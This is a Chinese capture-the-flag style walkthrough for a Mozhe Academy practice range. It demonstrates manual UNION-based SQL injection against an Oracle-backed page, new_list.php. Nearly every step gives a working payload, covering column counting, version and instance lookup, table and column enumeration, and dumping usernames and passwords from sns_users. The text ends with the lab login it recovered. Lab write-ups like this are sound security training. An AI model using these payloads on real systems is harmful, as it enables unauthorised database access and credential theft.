墨者学院靶场通过攻略

SQL手工注入漏洞测试(Oracle数据库)

一，判断是否存在注⼊点

1.点击红色箭头

2.点击后出现这个页面看见上面有？id=1我们来判断这个注入点

3.回显报错，说明"and 1=2"语句拼接到了后端数据库查询语句当中

二，通过order by来判断字段数。因为order by 2⻚⾯正常，order by 3⻚⾯不正常，故判断当前字段数为2

new_list.php?id=1 order by 2

new_list.php?id=1 order by 3

三：获取显错点，联合查询这⾥使⽤了union select，oracle数据库与mysql数据库不同点在于它对
于字段点数据类型敏感，也就是说我们不能直接union select 1,2,3来获取显错点了，需要在字符型字段48
使⽤字符型数据，整型字段使⽤整型数据才可以。如下，两个字段都为字符型，故使⽤union select‘null’,‘null’

四，查询数据库版本信息

new_list.php?id=-1 union select 'null',(select banner from sys.v_$version where rownum=1) from dual

五，查询当前数据库库名

new_list.php?id=-1 union select 'null',(select instance_name from V$INSTANCE) from dual

六，查询数据库表名，查询表名⼀般查询admin或者user表

new_list.php?id=-1 union select 'null',(select table_name from user_tables where rownum=1) from dual

new_list.php?id=-1 union select 'null',(select table_name from user_tables where rownum=1 and table_name not in 'LOGMNR_SESSION_EVOLVE$') from dual

new_list.php?id=-1 union select 'null',(select table_name from user_tables where rownum=1 and table_name not in 'LOGMNR_SESSION_EVOLVE$' and table_name not in 'LOGMNR_GLOBAL$') from dual

new_list.php?id=-1 union select 'null',(select table_name from user_tables where table_name like '%user%' and rownum=1) from dual

七，查询数据库列名
new_list.php?id=-1 union select 'null',(select column_name from user_tab_co
lumns where table_name='sns_users' and rownum=1) from dual

              

new_list.php?id=-1 union select 'null',(select column_name from user_tab_co
lumns where rownum=1 and column_name not in 'USER_NAME') from dual

new_list.php?id=-1 union select 'null' ,(select column_name from user_tab_columns where rownum=1 and column_name not in 'USER_NAME' and column_name not in 'AGENT_NAME' ) from dual

new_list.php?id=-1 union select 'null',(select column_name from user_tab_columns where rownum=1 and column_name not in 'USER_NAME' and column_name not in 'AGENT_NAME' and column_name not in 'PROTOCOL' and column_name not in 'SPARE1' and column_name not in 'DB_USERNAME' and column_name not in 'OID' and column_name <> 'EVENTID' and column_name <> 'NAME' and column_name <> 'TABLE_OBJNO') from dual

模糊搜索查询

new_list.php?id=-1 union select 'null',(select column_name from user_tab_co
lumns where table_name='sns_users' and rownum=1 and column_name like '%USE
R%') from dual

new_list.php?id=-1 union select 'null',(select column_name from user_tab_co
lumns where table_name='sns_users' and rownum=1 and column_name like '%USE
R%' and column_name <> 'USER_NAME') from dual

⼋，查询数据库数据获取账号密码的字段内容

new_list.php?id=-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1

new_list.php?id=-1 union select USER_NAME,USER_PWD from "sns_users" where r
ownum=1 and USER_NAME <> 'zhong'

new_list.php?id=-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1 and USER_NAME <> 'zhong' and USER_NAME not in 'hu'

九，对其数据库内的字段内容进⾏解密....进⾏后台登录

mozhe：439718